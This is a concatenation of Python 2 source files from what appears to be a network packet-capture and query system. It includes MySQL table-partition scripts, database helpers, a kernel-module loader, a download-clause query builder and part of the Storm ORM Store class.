createStmt = "CREATE TABLE " + ipFlowPartitionName + " (id SERIAL, start_time TIMESTAMP, end_time TIMESTAMP, hwport INT, src_is_ipv6 BOOL, ms_src_ip BIGINT UNSIGNED, ls_src_ip BIGINT UNSIGNED, dst_is_ipv6 BOOL, ms_dst_ip BIGINT UNSIGNED, ls_dst_ip BIGINT UNSIGNED, protocol INT, src_port INT, dst_port INT, ip_tos INT, src_bytes BIGINT UNSIGNED, dst_bytes BIGINT UNSIGNED, src_frames BIGINT UNSIGNED, dst_frames BIGINT UNSIGNED, prev BOOL, next BOOL, t1 TIMESTAMP, t2 TIMESTAMP, vlan INT UNSIGNED, val1 BIGINT UNSIGNED, val2 BIGINT UNSIGNED, val3 BIGINT UNSIGNED, val4 BIGINT UNSIGNED);\n"
alterStmt = "ALTER TABLE " + ipFlowPartitionName + " ADD INDEX(start_time), ADD INDEX(end_time), ADD INDEX(ms_src_ip), ADD INDEX(ls_src_ip), ADD INDEX(ms_dst_ip), ADD INDEX(ls_dst_ip), ADD INDEX(protocol), ADD INDEX(src_port), ADD INDEX(dst_port), ADD INDEX(vlan), ADD INDEX(val4);\n"
FILE.write(dropStmt)
FILE.write(createStmt)
FILE.write(alterStmt)
mergeStmt = "CREATE TABLE ip_flow (id SERIAL, start_time TIMESTAMP, end_time TIMESTAMP, hwport INT, src_is_ipv6 BOOL, ms_src_ip BIGINT UNSIGNED, ls_src_ip BIGINT UNSIGNED, dst_is_ipv6 BOOL, ms_dst_ip BIGINT UNSIGNED, ls_dst_ip BIGINT UNSIGNED, protocol INT, src_port INT, dst_port INT, ip_tos INT, src_bytes BIGINT UNSIGNED, dst_bytes BIGINT UNSIGNED, src_frames BIGINT UNSIGNED, dst_frames BIGINT UNSIGNED, prev BOOL, next BOOL, t1 TIMESTAMP, t2 TIMESTAMP, vlan INT UNSIGNED, val1 BIGINT UNSIGNED, val2 BIGINT UNSIGNED, val3 BIGINT UNSIGNED, val4 BIGINT UNSIGNED) ENGINE=MERGE UNION=("
for index2 in range(totalPartitions):
mergeStmt = mergeStmt + str_list[index2]
if (index2 + 1) < totalPartitions:
mergeStmt = mergeStmt + ","
mergeStmt = mergeStmt + ");\n"
FILE.write("DROP TABLE IF EXISTS ip_flow;\n")
FILE.write(mergeStmt)
ipFlowPartitionName = "ip_flow"
alterStmt = "ALTER TABLE " + ipFlowPartitionName + " ADD INDEX(start_time), ADD INDEX(end_time), ADD INDEX(ms_src_ip), ADD INDEX(ls_src_ip), ADD INDEX(ms_dst_ip), ADD INDEX(ls_dst_ip), ADD INDEX(protocol), ADD INDEX(src_port), ADD INDEX(dst_port), ADD INDEX(vlan), ADD INDEX(val4);\n"
FILE.write(alterStmt)
createTunnelTables()
createCallTraceTables()
createCallTraceEndTables()
createTunnelEndTables()
createUeIpPartitionTables()
createIpFlowTables()
FILE.write("FLUSH TABLES;\n")
FILE.close()
print "Finished writing to partitionTables.sql"
```
#### File: PI-slim-napa/db/mysql_migrate.py
```python
from warnings import filterwarnings
import MySQLdb
import MySQLdb.cursors
# Suppress Warnings. We have all the exceptions covered.
filterwarnings('ignore', category = MySQLdb.Warning)
#start sql helper functions
def open_db(options, dictcursor=None):
if options.unit_test == True:
db_name=options.testdbname
else:
db_name=options.dbname
if not dictcursor:
return MySQLdb.connect(options.dbhostname, options.dbusername, options.dbpassword, db_name)
return MySQLdb.connect(options.dbhostname, options.dbusername, options.dbpassword, db_name, cursorclass=dictcursor)
def db_execute(options, sql, catch_error=False, print_error=False):
db = open_db(options)
cursor = db.cursor()
try:
# Execute the SQL command
cursor.execute(sql)
db.commit()
return cursor.lastrowid # last affected row id
except Exception as e:
db.rollback()
if catch_error:
if print_error: print 'db_execute caught exception: %s'%str(e)
else:
raise # Raise the exception
finally:
# close the cursor and commit the transaction
cursor.close()
db.close()
def db_fetch_next_row(options, sql):
# Open database connection
db = open_db(options)
# prepare a cursor object using cursor() method
cursor = db.cursor()
row = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception: # Try to shutdown gracefully
pass
#logger.error('fetch next row Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if row is not None:
return row
else:
return (None,)
def db_fetch_remaining_rows(options, sql):
# Open database connection
db = open_db(options)
# prepare a cursor object using cursor() method
cursor = db.cursor()
rows = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
rows = cursor.fetchall()
except Exception:
pass
#logger.error('fetch remaining rows Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if rows is not None:
return rows
else:
return (None,)
def db_fetch_next_row_dict(options, sql):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
row = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception:
pass
#logger.error('fetch next row dict Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if row is not None:
return row
else:
return (None,)
def db_fetch_remaining_rows_dict(options, sql):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
rows = None
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
rows = cursor.fetchall()
except Exception:
pass
#logger.error('fetch remaining rows dict Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
if rows is not None:
return rows
else:
return (None,)
def db_fetch_col_by_string(options, sql, index):
# Open database connection
db = open_db(options, MySQLdb.cursors.DictCursor)
# prepare a cursor object using cursor() method
cursor = db.cursor()
try:
# Execute the SQL command
cursor.execute(sql)
# Fetch all the rows in a list of lists.
row = cursor.fetchone()
except Exception:
pass
#logger.error('fetch col by string Caught Exception: %s.\t\t' % (str(e),))
# disconnect from server
db.close()
#check for key membership
try:
if row.has_key(index):
return row[index]
except Exception:
pass
#logger.error('fetch col by string Caught Exception: %s.\t\t' % (str(e),))
return 0
```
#### File: recdopt_py/common/kernel.py
```python
import os, sys, logging, subprocess
log = logging.getLogger('recd')
from sys_utils import SysUtils
kernel_folder = '/opt/MassTransit/kernel'
class KernelModule(object):
def __init__(self, module, args=''):
self.module = module
self.args = args
self.last_output = None
def installed(self):
self.last_output = SysUtils.run_command('lsmod | grep %s'%(self.module))
return len(self.last_output['stdout']) > 0
def uninstall(self, force=False):
if force:
self.last_output = SysUtils.run_command('rmmod -f %s'%(self.module))
else:
self.last_output = SysUtils.run_command('rmmod %s'%(self.module))
return not self.installed()
def reinstall(self):
self.uninstall()
return self.install()
def install(self):
if self.installed(): return True
self.last_output = SysUtils.run_command('insmod %s/%s.ko %s'%(kernel_folder,self.module,self.args))
return len(self.last_output['stdout']) == 0 and len(self.last_output['stderr']) == 0
if __name__ == "__main__":
# print to stdout
log.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
log.addHandler(streamHandler)
log.info("Kernel Unit Test")
pf_ring = KernelModule('pf_ring')
ixgbe = KernelModule('ixgbe','adapters_to_enable=00:E0:ED:FF:D0:06,00:E0:ED:FF:D0:07 mtu=9000')
ixgbe.uninstall()
pf_ring.uninstall()
log.info('install: ' + str(pf_ring.install()))
log.info('install: ' + str(ixgbe.install()))
log.info('last out: ' + str(ixgbe.last_output))
```
#### File: recdopt_py/common/os_utils.py
```python
import os
from shutil import rmtree
class OSUtils(object):
# Makes a directory
@staticmethod
def make_dir(dir,logger=None):
try:
if not os.path.exists(dir):
if logger: logger.info("Creating directory: %s" % dir)
os.makedirs(dir)
except OSError, e:
if logger: logger.error("Error creating directory: %s. Error: %s" % (dir, e,))
return False
return True
# Removes a directory
@staticmethod
def remove_dir(dir,logger=None):
if logger: logger.info("Removing directory: %s" % dir )
rmtree(dir, ignore_errors=True)
# Removes a file and handles thrown exceptions
@staticmethod
def remove_file(file,logger=None):
try:
if logger: logger.info("Removing file: %s" % file )
os.remove( file )
except OSError, e:
pass # ignore errors
@staticmethod
def freespace(dir,reserve=0.0):
try:
s = os.statvfs(dir)
space = s.f_bsize * s.f_bavail
space -= OSUtils.disk_size(dir)*reserve # shave off a percentage
return max(0,space)
except Exception as e:
# Ignore error. Zero is worst case
return 0
@staticmethod
def disk_size(dir):
try:
s = os.statvfs(dir)
return s.f_bsize * s.f_blocks
except Exception as e:
# Ignore error. Zero is worst case
return 0
```
#### File: recdopt_py/common/rolling_counter.py
```python
class RollingCounter(object):
def __init__(self, roll_on):
self.roll_on = roll_on
self.count = 0
def step(self):
self.count += 1
if self.count < self.roll_on:
return False
self.count = 0
return True
if __name__ == "__main__":
import sys
print "RollingCounter Unit Test"
counter = RollingCounter(10)
for i in range(9):
if counter.step() is True:
print "Failed on step %d"%i
sys.exit()
if counter.step() is False:
print "Failed on step 10"
if counter.step() is True:
print "Failed on step 11"
print "All Tests Passed"
```
#### File: recdopt_py/db/download_clause.py
```python
import time, calendar, logging
from common.time_utils import TimeUtils
from common.c_utils import CUtils
import recdopt_context
from recdopt_context import *
from storm.locals import *
log = logging.getLogger('recd')
class DownloadClauseField(Storm):
__storm_table__ = "download_clause_field"
id = Int(primary=True)
description = Unicode()
class DownloadClauseType(Storm):
__storm_table__ = "download_clause_type"
id = Int(primary=True)
description = Unicode()
class DownloadClause(Storm):
__storm_table__ = "download_clause"
id = Int(primary=True)
download_id = Int()
download = Reference(download_id, 'Download.id')
parent_id = Int()
download_clause_field_id = Int()
download_clause_field = Reference(download_clause_field_id, 'DownloadClauseField.id')
download_clause_type_id = Int()
download_clause_type = Reference(download_clause_type_id, 'DownloadClauseType.id')
parameter = Unicode()
str = ''
def __str__(self): return self.str
# Special hook that is called when this object is loaded from the database
def __storm_loaded__(self):
# The QUERY type references the download table whereas every other type is a reference to another clause
if self.download_clause_type.description == "QUERY":
setattr(self.__class__, 'parent', Reference(DownloadClause.parent_id, 'Download.id'))
else:
setattr(self.__class__, 'parent', Reference(DownloadClause.parent_id, 'DownloadClause.id'))
self.str = "Clause %3d: " % (self.id)
# Debug Printing
if self.download_clause_type.description == "QUERY":
self.str += "QUERY"
elif self.download_clause_type.description == "AND":
self.str += " AND"
elif self.download_clause_type.description == "OR":
self.str += " OR"
elif self.download_clause_type.description == "NOT":
self.str += " NOT"
elif self.download_clause_type.description == "ALL":
self.str += " ALL"
elif self.download_clause_type.description == "GREATERTHAN":
self.str += " " + self.download_clause_field.description + " > " + self.parameter
elif self.download_clause_type.description == "LESSTHAN":
self.str += " " + self.download_clause_field.description + " < " + self.parameter
elif self.download_clause_type.description == "EQUALTO":
self.str += " " + self.download_clause_field.description + " == " + self.parameter
else:
self.str += " " + self.download_clause_field.description + " " + self.download_clause_type.description + " " + self.parameter
# Recursive load childen of this object
def load_tree(self, store):
QUERY_TYPE = store.find(DownloadClauseType, DownloadClauseType.description == u'QUERY').one()
# Find any clause that is not a query
self.children = store.find(DownloadClause, DownloadClause.parent_id == self.id, DownloadClause.download_clause_type_id != QUERY_TYPE.id)
for child in self.children: child.load_tree(store)
# This class builds a list of dict objects for the download id
# Changing these values will not update the database. It is meant as a view only class
class DownloadClauseList(list):
def __init__(self,options,database,download_id):
self.options = options
self.store = Store(database)
self.download_id = download_id
self.error = ''
self.valid = False
self.impossible_query = False
query = self.store.find(DownloadClause, DownloadClause.parent_id == self.download_id,
DownloadClause.download_clause_type_id == 1).one()
if query is None:
self.error = "No download_clause found"
log.warning(self.error)
return
# Recursive build the tree from each layer of clauses. Only be 3 levels deep at most.
try:
query.load_tree(self.store)
# These children are "AND"s
for k in query.children:
clause = dict()
# Build a dict for each group and append it to the list
for i in k.children:
clause[i.download_clause_field.description] = str(i.parameter)
#log.info(str(i))
self.append(clause)
except Exception as e:
self.error = 'The download_clause tree is invalid: ', str(e)
log.warning(self.error)
return
# Figure out min and max time
min_time = None
max_time = None
alt_min_time = None
alt_max_time = None
for clause in self:
if not (clause.has_key("TEID") and not clause.has_key("CALLID")):
(min_time, max_time) = self.get_min_max_time(clause, min_time, max_time)
else:
(alt_min_time, alt_max_time) = self.get_min_max_time(clause, alt_min_time, alt_max_time)
# Check for SART request
if min_time is None or max_time is None:
(min_time, max_time) = (alt_min_time, alt_max_time)
if max_time == None:
max_time = calendar.timegm(time.gmtime())
# Impossible Query Handling
if min_time != None and max_time != None:
ds_start_time = recdopt.recdopt_get_begin_time()
ds_end_time = recdopt.recdopt_get_end_time()
# Check if this is not compltely out of the data store time range
if min_time < ds_end_time and max_time > ds_start_time:
# Fix the times in hw mode so they only search within the data store time
if self.options.acq_type != 'sw':
if min_time < ds_start_time:
log.info("Start time prior to data store start time. moving start time")
min_time = ds_start_time
if max_time > ds_end_time:
log.info("End time after data store end time. moving end time")
max_time = ds_end_time
self.impossible_query = False
else:
self.error = "Search range outside data store range: \nData Store Range: %s -> %s. \nSearch Range: %s -> %s" % \
( TimeUtils.seconds_to_time_str(ds_start_time), TimeUtils.seconds_to_time_str(ds_end_time), \
TimeUtils.seconds_to_time_str(min_time), TimeUtils.seconds_to_time_str(max_time),)
log.warning(self.error.replace('\n','')) # don't print line breaks in the log. line breaks are for the GUI
self.impossible_query = True
# Set instance variables
self.valid = bool((min_time and max_time) and not self.impossible_query)
if not (min_time and max_time):
self.error = 'Could not determine minimum or maximum time'
self.min_time = min_time
self.max_time = max_time
def get_min_max_time(self,clause,min_time,max_time):
if clause.has_key("STARTTIME"):
if clause["STARTTIME"] != '0000-00-00 00:00:00' and clause["STARTTIME"] != '':
if min_time == None or TimeUtils.time_str_to_seconds(clause["STARTTIME"]) < min_time:
min_time = TimeUtils.time_str_to_seconds(clause["STARTTIME"])
else:
log.info("No start time for Call")
else:
log.info("No start time for Call ID")
if clause.has_key("ENDTIME"):
# SAB NOTE: A null or zero end time means we should search up until the current time.
if clause["ENDTIME"] == '' or clause["ENDTIME"] == '0000-00-00 00:00:00':
max_time = calendar.timegm(time.gmtime())
else:
if max_time == None or TimeUtils.time_str_to_seconds(clause["ENDTIME"]) > max_time:
max_time = TimeUtils.time_str_to_seconds(clause["ENDTIME"])
else:
max_time = calendar.timegm(time.gmtime())
return (min_time, max_time)
# Creates the open query clause for user plane and control plane
class OpenQueryClause(object):
def __init__(self,clause_list,start_time,end_time):
head = ctypes.POINTER(OPEN_QUERY_CLAUSE)()
cp_head = ctypes.POINTER(CALL_AGGREGATE_REQUEST)()
cp_head.next = None
count = 0
cp_count = 0
teid_counter = 0
cp_call_serial_dict = dict() # used to avoid duplicate call serial numbers in cp retrieval
# Loop over all the clauses
for clause in clause_list:
# If the clause falls outside of this interval, no sense using it as part of this search
if clause.has_key("ENDTIME") and clause["ENDTIME"] != '0000-00-00 00:00:00' and clause['ENDTIME'] != '':
if TimeUtils.time_str_to_seconds(clause["ENDTIME"]) < start_time:
continue
if clause.has_key("STARTTIME") and clause["STARTTIME"] != '0000-00-00 00:00:00' and clause['STARTTIME'] != '':
if TimeUtils.time_str_to_seconds(clause["STARTTIME"]) > end_time:
continue
query_clause = OPEN_QUERY_CLAUSE()
query_clause.call_id = 0
query_clause.teid = 0
query_clause.start_time = ""
query_clause.end_time = ""
query_clause.interfaces = ""
query_clause.src_ip = ""
query_clause.dst_ip = ""
query_clause.src_port = ""
query_clause.dst_port = ""
query_clause.any_port = ""
query_clause.protocol = ""
query_clause.ueip = ""
query_clause.vlan = ""
query_clause.mpls = ""
query_clause.ipoptions = 9
if clause.has_key("TEID"):
query_clause.teid = int(clause["TEID"])
if query_clause.teid > 0: teid_counter+=1
if clause.has_key("CALLID"):
query_clause.call_id = int(clause["CALLID"])
# Expand the start time based on the interval start passed in
if clause.has_key("STARTTIME") and clause["STARTTIME"] != '0000-00-00 00:00:00' and clause["STARTTIME"] != '':
max_start = max(start_time, TimeUtils.time_str_to_seconds(clause["STARTTIME"]))
query_clause.start_time = TimeUtils.seconds_to_time_str(max_start)
else:
query_clause.start_time = TimeUtils.seconds_to_time_str(start_time)
#log.info('query_clause.start_time: %s' % (query_clause.start_time))
# Contract the end time based on the interval end passed in
if clause.has_key("ENDTIME") and clause["ENDTIME"] != '0000-00-00 00:00:00' and clause["ENDTIME"] != '':
min_end = min(end_time, TimeUtils.time_str_to_seconds(clause["ENDTIME"]))
query_clause.end_time = TimeUtils.seconds_to_time_str(min_end)
else:
query_clause.end_time = TimeUtils.seconds_to_time_str(end_time)
if query_clause.end_time < query_clause.start_time:
log.error("Problem with time ranges! end time (%s) is less than start time (%s)"\
% (query_clause.end_time, query_clause.start_time))
#log.info('query_clause.end_time: %s' % (query_clause.end_time))
if clause.has_key("INTERFACE"):
query_clause.interfaces = clause["INTERFACE"].lower()
if clause.has_key("SRCIP"):
query_clause.src_ip = clause["SRCIP"]
if clause.has_key("DSTIP"):
query_clause.dst_ip = clause["DSTIP"]
if clause.has_key("SRCPORT"):
query_clause.src_port = clause["SRCPORT"]
if clause.has_key("DSTPORT"):
query_clause.dst_port = clause["DSTPORT"]
if clause.has_key("PORT"):
query_clause.any_port = clause["PORT"]
if clause.has_key("IPPROTOCOL"):
query_clause.protocol = clause["IPPROTOCOL"]
if clause.has_key("UEIP"):
query_clause.ueip = clause["UEIP"]
if clause.has_key("VLAN"):
query_clause.vlan = clause["VLAN"]
if clause.has_key("MPLS"):
query_clause.mpls = clause["MPLS"]
# To support SART legacy options, matchreversed and searchtunnel are folded into ipoptions.
if clause.has_key("MATCHREVERSED"):
if clause["MATCHREVERSED"].upper() == 'TRUE':
query_clause.ipoptions |= 0b1
elif clause["MATCHREVERSED"].upper() == 'FALSE':
query_clause.ipoptions &= 0b1110
elif int(clause["MATCHREVERSED"]) != 0:
query_clause.ipoptions |= 0b1
else:
query_clause.ipoptions &= 0b1110
if clause.has_key("SEARCHTUNNEL"):
if clause["SEARCHTUNNEL"].upper() == 'TRUE':
query_clause.ipoptions |= 0b110
elif clause["SEARCHTUNNEL"].upper() == 'FALSE':
query_clause.ipoptions &= 0b1001
elif int(clause["SEARCHTUNNEL"]) != 0:
query_clause.ipoptions |= 0b110
else:
query_clause.ipoptions &= 0b1001
# However, PI will only pass down IPOPTIONS (not matchreversed or searchtunnel)
if clause.has_key("IPOPTIONS"):
logger.info("Found ip options = %s" % (clause["IPOPTIONS"],))
query_clause.ipoptions = int(clause["IPOPTIONS"])
# Move the next pointer
query_clause.next = head
#If there are no tunnels with the call, then TEID == 0, but CALLID != 0
#In that case we do not want to really do an open ended ip search, which is what TEID == 0 would normally mean.
#Therefore in that case we want to set end_time = start_time to nerf the open ended IP search
if query_clause.call_id > 0 and query_clause.teid == 0:
# Skipping user plane
pass
else:
head = ctypes.pointer(query_clause)
count += 1
cp_query = CALL_AGGREGATE_REQUEST()
recdopt_context.set_context_string(cp_query, 'start_time', TimeUtils.seconds_to_time_str(start_time))
recdopt_context.set_context_string(cp_query, 'end_time', TimeUtils.seconds_to_time_str(end_time))
if clause.has_key("INTERFACE"):
recdopt_context.set_context_string(cp_query, 'interfaces', clause["INTERFACE"].lower())
else:
recdopt_context.set_context_string(cp_query, 'interfaces', 'S1,S11,S5,GX,GN'.lower())
cp_query.call_serial_number = 0
cp_query.next = None
# see if we have a call id/serial number that was passed in. If so create a cp_query entry to
# search for the control plane for that call
csn = query_clause.call_id;
if csn != 0:
iface = cp_query.interfaces
if(cp_call_serial_dict.has_key((csn,iface))):
log.info(""" Duplicate Call Serial Number %s with interface = %s ignored""" % (csn,iface))
else:
#log.info(""" Adding CP for Call Serial Number %s with interface %s""" % (csn,iface))
cp_query.call_serial_number = csn
cp_query.next = cp_head
cp_head = ctypes.pointer(cp_query)
cp_count += 1
cp_call_serial_dict[(csn,iface)]=cp_query
# Set instance variables
self.up_query_clause = head
self.cp_query_clause = cp_head
self.up_count = count
self.cp_count = cp_count
if __name__ == "__main__":
# print to stdout
log.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
log.addHandler(streamHandler)
log.info("download_clause Unit Test")
# Database objects are thread safe
database = create_database("mysql://root:gizzy@localhost:3306/recd")
class Options(object):
pass
options = Options()
options.acq_type = 'hw'
clause_list = DownloadClauseList(options,database,60)
print clause_list.error
print clause_list.valid
```
#### File: db/storm/store.py
```python
from copy import copy
from weakref import WeakValueDictionary
from operator import itemgetter
from storm.info import get_cls_info, get_obj_info, set_obj_info
from storm.variables import Variable, LazyValue
from storm.expr import (
Expr, Select, Insert, Update, Delete, Column, Count, Max, Min,
Avg, Sum, Eq, And, Asc, Desc, compile_python, compare_columns, SQLRaw,
Union, Except, Intersect, Alias, SetExpr)
from storm.exceptions import (
WrongStoreError, NotFlushedError, OrderLoopError, UnorderedError,
NotOneError, FeatureError, CompileError, LostObjectError, ClassInfoError)
from storm import Undef
from storm.cache import Cache
from storm.event import EventSystem
__all__ = ["Store", "AutoReload", "EmptyResultSet"]
PENDING_ADD = 1
PENDING_REMOVE = 2
class Store(object):
"""The Storm Store.
This is the highest-level interface to a database. It manages
transactions with L{commit} and L{rollback}, caching, high-level
querying with L{find}, and more.
Note that Store objects are not threadsafe. You should create one
Store per thread in your application, passing them the same
backend L{Database<storm.store.Database>} object.
"""
_result_set_factory = None
def __init__(self, database, cache=None):
"""
@param database: The L{storm.database.Database} instance to use.
@param cache: The cache to use. Defaults to a L{Cache} instance.
"""
self._database = database
self._event = EventSystem(self)
self._connection = database.connect(self._event)
self._alive = WeakValueDictionary()
self._dirty = {}
self._order = {} # (info, info) = count
if cache is None:
self._cache = Cache()
else:
self._cache = cache
self._implicit_flush_block_count = 0
self._sequence = 0 # Advisory ordering.
def get_database(self):
"""Return this Store's Database object."""
return self._database
@staticmethod
def of(obj):
"""Get the Store that the object is associated with.
If the given object has not yet been associated with a store,
return None.
"""
try:
return get_obj_info(obj).get("store")
except (AttributeError, ClassInfoError):
return None
def execute(self, statement, params=None, noresult=False):
"""Execute a basic query.
This is just like L{storm.database.Database.execute}, except
that a flush is performed first.
"""
if self._implicit_flush_block_count == 0:
self.flush()
return self._connection.execute(statement, params, noresult)
def close(self):
"""Close the connection."""
self._connection.close()
def commit(self):
"""Commit all changes to the database.
This invalidates the cache, so all live objects will have data
reloaded next time they are touched.
"""
self.flush()
self.invalidate()
self._connection.commit()
def rollback(self):
"""Roll back all outstanding changes, reverting to database state."""
for obj_info in self._dirty:
pending = obj_info.pop("pending", None)
if pending is PENDING_ADD:
# Object never got in the cache, so being "in the store"
# has no actual meaning for it.
del obj_info["store"]
elif pending is PENDING_REMOVE:
# Object never got removed, so it's still in the cache,
# and thus should continue to resolve from now on.
self._enable_lazy_resolving(obj_info)
self._dirty.clear()
self.invalidate()
self._connection.rollback()
def get(self, cls, key):
"""Get object of type cls with the given primary key from the database.
If the object is alive the database won't be touched.
@param cls: Class of the object to be retrieved.
@param key: Primary key of object. May be a tuple for composed keys.
@return: The object found with the given primary key, or None
if no object is found.
"""
if self._implicit_flush_block_count == 0:
self.flush()
if type(key) != tuple:
key = (key,)
cls_info = get_cls_info(cls)
assert len(key) == len(cls_info.primary_key)
primary_vars = []
for column, variable in zip(cls_info.primary_key, key):
if not isinstance(variable, Variable):
variable = column.variable_factory(value=variable)
primary_vars.append(variable)
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
obj_info = self._alive.get((cls_info.cls, primary_values))
if obj_info is not None and not obj_info.get("invalidated"):
return self._get_object(obj_info)
where = compare_columns(cls_info.primary_key, primary_vars)
select = Select(cls_info.columns, where,
default_tables=cls_info.table, limit=1)
result = self._connection.execute(select)
values = result.get_one()
if values is None:
return None
return self._load_object(cls_info, result, values)
def find(self, cls_spec, *args, **kwargs):
"""Perform a query.
Some examples::
store.find(Person, Person.name == u"Joe") --> all Persons named Joe
store.find(Person, name=u"Joe") --> same
store.find((Company, Person), Person.company_id == Company.id) -->
iterator of tuples of Company and Person instances which are
associated via the company_id -> Company relation.
@param cls_spec: The class or tuple of classes whose
associated tables will be queried.
@param args: Instances of L{Expr}.
@param kwargs: Mapping of simple column names to values or
expressions to query for.
@return: A L{ResultSet} of instances C{cls_spec}. If C{cls_spec}
was a tuple, then an iterator of tuples of such instances.
"""
if self._implicit_flush_block_count == 0:
self.flush()
find_spec = FindSpec(cls_spec)
where = get_where_for_args(args, kwargs, find_spec.default_cls)
return self._result_set_factory(self, find_spec, where)
def using(self, *tables):
"""Specify tables to use explicitly.
The L{find} method generally does a good job at figuring out
the tables to query by itself, but in some cases it's useful
to specify them explicitly.
This is most often necessary when an explicit SQL join is
required. An example follows::
join = LeftJoin(Person, Person.id == Company.person_id)
print list(store.using(Company, join).find((Company, Person)))
The previous code snippet will produce an SQL statement
somewhat similar to this, depending on your backend::
SELECT company.id, employee.company_id, employee.id
FROM company
LEFT JOIN employee ON employee.company_id = company.id;
@return: A L{TableSet}, which has a C{find} method similar to
L{Store.find}.
"""
return self._table_set(self, tables)
def add(self, obj):
"""Add the given object to the store.
The object will be inserted into the database if it has not
yet been added.
The C{added} event will be fired on the object info's event system.
"""
self._event.emit("register-transaction")
obj_info = get_obj_info(obj)
store = obj_info.get("store")
if store is not None and store is not self:
raise WrongStoreError("%s is part of another store" % repr(obj))
pending = obj_info.get("pending")
if pending is PENDING_ADD:
pass
elif pending is PENDING_REMOVE:
del obj_info["pending"]
self._enable_lazy_resolving(obj_info)
# obj_info.event.emit("added")
elif store is None:
obj_info["store"] = self
obj_info["pending"] = PENDING_ADD
self._set_dirty(obj_info)
self._enable_lazy_resolving(obj_info)
obj_info.event.emit("added")
return obj
def remove(self, obj):
"""Remove the given object from the store.
The associated row will be deleted from the database.
"""
self._event.emit("register-transaction")
obj_info = get_obj_info(obj)
if obj_info.get("store") is not self:
raise WrongStoreError("%s is not in this store" % repr(obj))
pending = obj_info.get("pending")
if pending is PENDING_REMOVE:
pass
elif pending is PENDING_ADD:
del obj_info["store"]
del obj_info["pending"]
self._set_clean(obj_info)
self._disable_lazy_resolving(obj_info)
obj_info.event.emit("removed")
else:
obj_info["pending"] = PENDING_REMOVE
self._set_dirty(obj_info)
self._disable_lazy_resolving(obj_info)
obj_info.event.emit("removed")
def reload(self, obj):
"""Reload the given object.
The object will immediately have all of its data reset from
the database. Any pending changes will be thrown away.
"""
obj_info = get_obj_info(obj)
cls_info = obj_info.cls_info
if obj_info.get("store") is not self:
raise WrongStoreError("%s is not in this store" % repr(obj))
if "primary_vars" not in obj_info:
raise NotFlushedError("Can't reload an object if it was "
"never flushed")
where = compare_columns(cls_info.primary_key, obj_info["primary_vars"])
select = Select(cls_info.columns, where,
default_tables=cls_info.table, limit=1)
result = self._connection.execute(select)
values = result.get_one()
self._set_values(obj_info, cls_info.columns, result, values,
replace_unknown_lazy=True)
self._set_clean(obj_info)
def autoreload(self, obj=None):
"""Set an object or all objects to be reloaded automatically on access.
When a database-backed attribute of one of the objects is
accessed, the object will be reloaded entirely from the database.
@param obj: If passed, only mark the given object for
autoreload. Otherwise, all cached objects will be marked for
autoreload.
"""
self._mark_autoreload(obj, False)
def invalidate(self, obj=None):
"""Set an object or all objects to be invalidated.
This prevents Storm from returning the cached object without
first verifying that the object is still available in the
database.
This should almost never be called by application code; it is
only necessary if it is possible that an object has
disappeared through some mechanism that Storm was unable to
detect, like direct SQL statements within the current
transaction that bypassed the ORM layer. The Store
automatically invalidates all cached objects on transaction
boundaries.
"""
if obj is None:
self._cache.clear()
else:
self._cache.remove(get_obj_info(obj))
self._mark_autoreload(obj, True)
def reset(self):
"""Reset this store, causing all future queries to return new objects.
Beware this method: it breaks the assumption that there will never be
two objects in memory which represent the same database object.
This is useful if you've got in-memory changes to an object that you
want to "throw out"; next time they're fetched the objects will be
recreated, so in-memory modifications will not be in effect for future
queries.
"""
for obj_info in self._iter_alive():
if "store" in obj_info:
del obj_info["store"]
self._alive.clear()
self._dirty.clear()
self._cache.clear()
# The following line is untested, but then, I can't really find a way
# to test it without whitebox.
self._order.clear()
def _mark_autoreload(self, obj=None, invalidate=False):
if obj is None:
obj_infos = self._iter_alive()
else:
obj_infos = (get_obj_info(obj),)
for obj_info in obj_infos:
cls_info = obj_info.cls_info
for column in cls_info.columns:
if id(column) not in cls_info.primary_key_idx:
obj_info.variables[column].set(AutoReload)
if invalidate:
# Marking an object with 'invalidated' means that we're
# not sure if the object is actually in the database
# anymore, so before the object is returned from the cache
# (e.g. by a get()), the database should be queried to see
# if the object's still there.
obj_info["invalidated"] = True
# We want to make sure we've marked all objects as invalidated and set
# up their autoreloads before calling the invalidated hook on *any* of
# them, because an invalidated hook might use other objects and we want
# to prevent invalidation ordering issues.
if invalidate:
for obj_info in obj_infos:
self._run_hook(obj_info, "__storm_invalidated__")
def add_flush_order(self, before, after):
"""Explicitly specify the order of flushing two objects.
When the next database flush occurs, the order of data
modification statements will be ensured.
@param before: The object to flush first.
@param after: The object to flush after C{before}.
"""
pair = (get_obj_info(before), get_obj_info(after))
try:
self._order[pair] += 1
except KeyError:
self._order[pair] = 1
def remove_flush_order(self, before, after):
"""Cancel an explicit flush order specified with L{add_flush_order}.
@param before: The C{before} object previously specified in a
call to L{add_flush_order}.
@param after: The C{after} object previously specified in a
call to L{add_flush_order}.
"""
pair = (get_obj_info(before), get_obj_info(after))
self._order[pair] -= 1
def flush(self):
"""Flush all dirty objects in cache to database.
This method will first call the __storm_pre_flush__ hook of all dirty
objects. If more objects become dirty as a result of executing code
in the hooks, the hook is also called on them. The hook is only
called once for each object.
It will then flush each dirty object to the database, that is,
execute the SQL code to insert/delete/update them. After each
object is flushed, the hook __storm_flushed__ is called on it,
